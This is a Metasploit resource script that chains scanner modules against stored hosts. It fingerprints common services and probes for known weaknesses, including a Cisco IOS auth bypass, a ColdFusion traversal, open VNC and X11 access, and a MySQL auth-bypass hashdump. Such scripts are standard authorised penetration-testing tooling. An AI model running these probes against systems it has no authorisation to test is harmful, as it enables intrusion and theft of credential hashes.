use auxiliary/scanner/ssh/ssh_version
services -p 22 -u -R
setg THREADS 15
exploit -j -q

use auxiliary/scanner/ftp/ftp_version
services -p 21 -u -R
exploit -j -q

use auxiliary/scanner/h323/h323_version
services -p 1720 -u -R
exploit -j -q

use auxiliary/scanner/oracle/tnslsnr_version
services -p 1521 -u -R
exploit -j -q

use auxiliary/scanner/pcanywhere/pcanywhere_tcp
services -p 5631 -u -R
exploit  -j -q

use auxiliary/scanner/smtp/smtp_version
services -p 25 -u -R
exploit -j -q

use auxiliary/scanner/telnet/telnet_version
services -p 23 -u -R
exploit -j -q

use auxiliary/scanner/vnc/vnc_none_auth
services -p 5900 -u -R
exploit -j -q

use auxiliary/scanner/pop3/pop3_version
services -p 101 -u -R
exploit -j -q

use auxiliary/scanner/mysql/mysql_version
services -p 3306 -u -R
exploit -j -q

use auxiliary/scanner/http/http_version 
services -p 80 -u -R
exploit -j -q
services -p 443 -u -R
set SSL true
set rport 443
exploit -j -q

#use auxiliary/scanner/mssql/mssql_ping
#set rhosts file:hosts/windows.txt
#set USERNAME smp_random
#spool mssql_ping.meter.log
#exploit
#spool off

use auxiliary/scanner/http/http_put
services -p 80 -u -R
set FILEDATA smptesting
set FILENAME smptesting.txt
spool put.meter.log
exploit
spool off

use auxiliary/scanner/http/cisco_ios_auth_bypass
services -p 80 -S cisco -u -R
spool ios_bypass.meter.log
exploit
spool off

use auxiliary/scanner/misc/java_rmi_server
services -p 1099 -u -R
spool java_rmi.meter.log
exploit
spool off

use auxiliary/scanner/http/jboss_vulnscan
services -p 80 -S Windows -S unix -u -R
spool j_boss.meter.log
exploit
spool off

services -p 443 -S Windows -S unix -u -R
set SSL true
spool j_boss.meter.log
exploit
spool off

use auxiliary/scanner/http/tomcat_mgr_login
services -p 8080 -u -R
spool tomcat.meter.log
exploit
spool off

use auxiliary/scanner/x11/open_x11
services -p 6000 -u -R
spool x11.meter.log
exploit
spool off

use auxiliary/scanner/vnc/vnc_none_auth
services -S vnc -u -R
spool vnc.meter.log
exploit
spool off

use auxiliary/scanner/x11/open_x11
services -S x11 -u -R
spool x11.meter.log
exploit
spool off

use auxiliary/scanner/http/coldfusion_locale_traversal
services -p 80 -u -R
spool coldfusion.meter.log
exploit
spool off

use auxiliary/scanner/http/rails_xml_yaml_scanner
services -p 80 -u -R
spool coldfusion.meter.log
exploit
spool off

use auxiliary/scanner/mysql/mysql_authbypass_hashdump
services -p 3306 -u -R
spool mysql_auth_bypass.meter.log
exploit
spool off

exit